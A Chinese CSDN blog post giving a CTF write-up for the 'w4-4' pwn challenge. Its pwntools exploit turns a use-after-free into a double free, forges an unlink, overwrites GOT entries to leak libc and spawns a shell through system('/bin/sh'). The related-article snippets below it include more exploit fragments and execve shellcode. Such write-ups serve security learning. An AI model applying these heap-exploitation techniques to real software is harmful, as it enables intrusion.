w4-4

最新推荐文章于 2023-10-29 21:05:01 发布
最新推荐文章于 2023-10-29 21:05:01 发布
阅读量178 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sunrise19960110/article/details/90707135
版权

漏洞:delete指针未清0,产生UAF。
基本功能

  1. Keep secret①small②big③huge
  2. Wipe secret
  3. Renew secret

交互

def add(index, content):
    p.recvuntil("Renew secret\n")
    p.sendline("1")
    p.recvuntil("\n")
    p.sendline(str(index))
    p.recvuntil("secret: \n")
    p.send(content)
def delete(index):
    p.recvuntil("3. Renew secret\n")
    p.sendline("2")
    p.recvuntil("Big secret\n")
    p.send(str(index))
def update(index, content):
    p.recvuntil("Renew secret\n")
    p.sendline("3")
    p.recvuntil("Big secret\n")
    p.sendline(str(index))
    p.recvuntil("secret: \n")
    p.send(content)

exp:
1、由于UAF造成double free。
2、构造unlink
3、改变table为atoi_got和puts_got
4、leak+system(’/bin/sh’)

# Double Free
add(1, 'aaa')
add(2, 'bbb')
delete(1)
add(3, 'ccc')# huge secret导致fastbin中的内容被放入smallbin
delete(1)# 放入fastbin

#Fake Chunk
f_ptr = 0x6020d0
s_ptr = 0x6020c0
fake_chunk  = p64(0) + p64(0x21)
fake_chunk += p64(0x6020d0-0x18) + p64(0x6020d0-0x10)
fake_chunk += p64(0x20)# presize位置被与一个堆块共用
# 从fastbin中取出堆块,构造unlink。
add(1, fake_chunk)
delete(2)

free_got = elf.got['free']
atoi_got = elf.got['atoi']
puts_got = elf.got['puts']
puts_plt = elf.plt['puts']
system_offset = libc.symbols['system']
atoi_offset = libc.symbols['atoi']

content = p64(0) + p64(atoi_got)# big
content += p64(0) + p64(free_got) + p32(0x1)*3 # small
update(1, content)# 构造table
update(1, p64(puts_plt)) # change free_got to puts, leak atoi_got
# leak
delete(2) # puts(atoi)
libc_base = u64(p.recvn(6).ljust(8, "\x00")) - atoi_offset
system = libc_base + system_offset
# system('/bin/sh')
update(1, p64(system))
add(2, "/bin/sh\x00")
delete(2)
p.interactive()

反思:
1、fastbin被放入smallbin还需看代码了解。
2、presize可以被前一个堆块控制,需要进一步观察。
相关资源:
https://gitee.com/sunrise1/CTF/blob/master/w4-4.zip

__sunrise__
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
W4算法
想当运维的程序猿
12-02 1132
年份 论文题目 作者 论文内容 2000 W4: real-time surveillance of people and their activities Haritaoglu, I., Harwood, D., Davis, L.S. 还没看
PWN基础之构造ROP链(基本ROP)
weixin_46132162的博客
02-02 4205
​随着 NX 保护的开启,以往直接向栈或者堆上直接注入代码的方式难以继续发挥效果。攻击者们也提出来相应的方法来绕过保护,目前主要的是(Return Oriented Programming),其主要思想是在**栈缓冲区溢出的基础上,利用程序中已有的小片段 (gadgets) 来改变某些寄存器或者变量的值,从而控制程序的执行流程。**所谓 gadgets 就是以 ret 结尾的指令序列,通过这些指令序列,我们可以修改某些地址的内容,方便控制程序的执行流程。
记第一次解PWN题目
天道酬勤
09-02 516
# -*- coding: cp936 -*- from pwn import * g_local=False #不设置log_level为debug会导致程序的输出不显示出来 context.log_level = 'debug' if g_local: #启动程序 p = process('./club') #调试器附加该程序 #gdb.att...
PWN PWN PWN !!! 技巧 (4)
最新发布
Xzzzz911的博客
10-29 949
紧接上述技巧(1),技巧(2)和技巧(3),这次总结一些常用的命令,重定向和一些整数溢出需要了解的知识点,还有一些接收发送的命令多做多总结,慢慢的要开始进攻堆了,加油加油,冲冲冲!!!
c语言短整型范围越界,[原创]数组越界之入门向
weixin_33959449的博客
05-25 681
前言:做题时候遇到的第一道数组越界的pwn题,其中负数利用有一块地方刚开始一直弄不太明白,发帖求助了一下,在此感谢holing大佬的帮助。介绍:0x1. 数组越界原理:0x1. 堆中的数组越界:因为堆是我们自己分配的,如果越界,那么会把堆中其他空间的数据给写掉,或读取了其他空间的数据,这样就会导致其他变量的数据变得不对,如果是一个指针的话,那么有可能会引起crash,这里我们主要谈论栈中的数组越界...
w4-学生.zip
09-19
【标题】"w4-学生.zip"所对应的可能是一个与教育、学习或课程相关的压缩文件。在IT领域,这样的文件通常包含一系列与教学材料、作业、项目或编程练习相关的资源。"w4"可能指的是第四周的学习内容,这在很多在线课程...
GA-W4-Trulia-Project
02-19
GA-W3- Trulia实验室项目任务是按照模型jpg所示构建页面。 特鲁里亚。大体时间GA兼读课程的第3周有5个小时。目标确定需要使用flexbox的位置。 创建弹性容器。 对齐并对齐内部元素。 样式可重复使用的组件,例如。...
W4-60c型挖掘机整机分解程序研究
06-29
针对我国工程机械维修人员对大修机械的盲目、随意拆卸问题,经数十次的分解试验,总结出了W4-60c型挖掘机整机分解程序,解决了该机型无实用整机分解程序这一难题,从而达到提高工程机械维修质量的目地。
w4d2-project
03-31
4. `images/` - 图片或图形资源的子目录。 5. `data/` - 可能包含项目使用的JSON或其他数据文件。 6. `lib/` - 如果项目使用了第三方库或框架,它们可能会被存储在这里。 7. `README.md` - 项目介绍和指南,包括如何...
arts106-w4-probuilder-FormulaNewts:GitHub Classroom创建的arts106-w4-probuilder-FormulaNewts
02-14
2020年-ProBuilder-Base
python_dateutil模块组件
05-27
windows下使用matplotlib的必要模块组件 对应python3.4,32位
ctfshow 摆烂杯 pwn 2/100
m0_57754423的博客
02-22 3177
dota: 考点: 整数溢出 ret2libc exp: from pwn import * # p = process("./dota") p = remote("pwn.challenge.ctf.show",28127) e = ELF("./dota") p.timeout = 0.5 context.log_level = 'debug' libc = e.libc p.recvuntil("--------\n") p.recvuntil("--------\n") p.sendline("
初始heap,pwnable_echo2
qq_51687381的博客
07-25 140
from pwn import * p=process("./echo2") elf=ELF("./echo2") p.recvuntil("hey, what's your name? : ") shellcode=b"\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05" p.sendline(shellcode) p.recvuntil(b"> ") p.se.
KEPLER: Facilitating Control-flow Hijacking Primitive Evaluation for Linux Kernel Vulnerabilities
sunrise19960110的博客
11-30 270
Abstract 自动利用的挑战:将一个可利用的状态与一个rop链相连。控制流劫持是一个方案。 困境:普遍的利用缓解技术,利用路径上的陷阱和不适宜的原语,导致手工生成linux内核利用原语都很困难。 成果:提出KEPLER来生成一个单发的利用链来帮助利用生成。 具体:接受一个控制流劫持原语作为输入,符号化地缝合一些流行内核编码风格和相应片段以生成ROP载荷。 实验:通过比较先前地自动利用生成技术和...
浅析栈溢出遇到的坑及绕过技巧
蚁景网安学院
12-25 925
0x00前言对于刚开始入门pwn的萌新来说可能会遇到一些坑,这里我就来总结一下我之前做栈溢出的时候遇到的两种坑以及绕过技巧,具体我会通过例题来讲解,希望对此时正在入门的pwn的萌新能带来...
python until怎么用_python使用技巧
weixin_39562234的博客
02-19 1309
1 使用colorama库带颜色输出日志#!/usr/bin/env python#encoding: utf-8from colorama import init, Fore, Back, Styleif __name__ == "__main__":init(autoreset=True) # 初始化,并且设置颜色设置自动恢复print(Fore.RED + 'some red tex...
python中字符串的ljust、rjust、center方法
专注Java后端技术干货、项目源码总结分享,期待您的关注。
08-25 209
抗渗等级p6是什么意思_混凝土抗渗等级w4是什么意思?
热门推荐
weixin_32645721的博客
01-30 1万+
混凝土抗渗等级可按28d龄期的标准试件测定,混凝土抗渗等级分为:W2、W4、W6、W8、W10、W12六级。 根据建筑物开始承受水压力的时间,也可利用60d或90d龄期的试件测定抗渗等级。抗渗等级是以28d龄期的标准试件,按标准试验方法进行试验时所能承受的最大水压力来确定。GB 50164《混凝土质量控制标准》根据混凝土试件在抗渗试验时所能承受的最大水压力,混凝土的抗渗等级划分为P4、P6、P8、...
Blind_pwn之格式化字符串
蚁景网安学院
07-07 994
可能需要提前了解的知识格式化字符串原理&利用got & plt 调用关系程序的一般启动过程原理格式化字符串盲打指的是只给出可交互的 ip 地址与端口,不给出对应的 bin...
STC15W4K单片机学习手册:从入门到实战
4. SPI接口:同步串行接口,可用于连接各种SPI兼容设备,如传感器和存储器。 5. 比较器:可以进行模拟信号的比较,用于信号检测或触发中断。 6. ADC转换器:用于将模拟信号转换为数字信号,适用于各种传感器数据采集...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值